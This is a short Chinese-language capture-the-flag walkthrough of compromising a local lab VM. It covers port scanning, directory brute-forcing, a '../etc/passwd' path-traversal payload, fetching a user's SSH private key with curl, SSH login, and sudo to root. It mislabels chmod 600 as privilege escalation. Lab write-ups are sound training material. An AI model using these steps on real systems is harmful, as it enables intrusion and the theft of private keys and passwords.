1、扫描靶机地址
nmap c段
2、访问IP
3、爆破目录
gobuster dir -u http://192.168.19.164 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
扫到这么多,依次看一下响应码是200的目录,最终在robots.txt看到了
暂时还不知道这是什么信息,但是先有个印象,然后我在text.php看到了
告诉我们缺少get参数,说明这里是get传参的,我们尝试一下有没有文件读取漏洞
?file=../../../../../../etc/passwd
说明这里是存在任意文件读取漏洞的,我们看一下里面的信息,发现了用户qiu
去查看他的秘钥
用:curl http://192.168.19.164/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa导出秘钥,再用cat查看:cat id_rsa
为秘钥文件提权
chmod 600 id_rsa
可以看到已经提权了,接着利用秘钥登录这个qiu用户
ssh qiu@192.168.19.164 -i id_rsa
进来之后先查看一下有什么文件
然后去看看这些文件都有什么信息
在历史记录文件发现这个用户输出了remarkablyawesomE并上传了,然后就执行了ifconfig,那可能这个就是密码,用户登上去之后就查看IP,我们尝试一下
输入sudo -l ,把密码输入进去
确实可以,而且权限是和root一个级别的,那么我们切换到root用户,查看文件
sudo su切换到root用户,cat ~/remarks.txt查看flag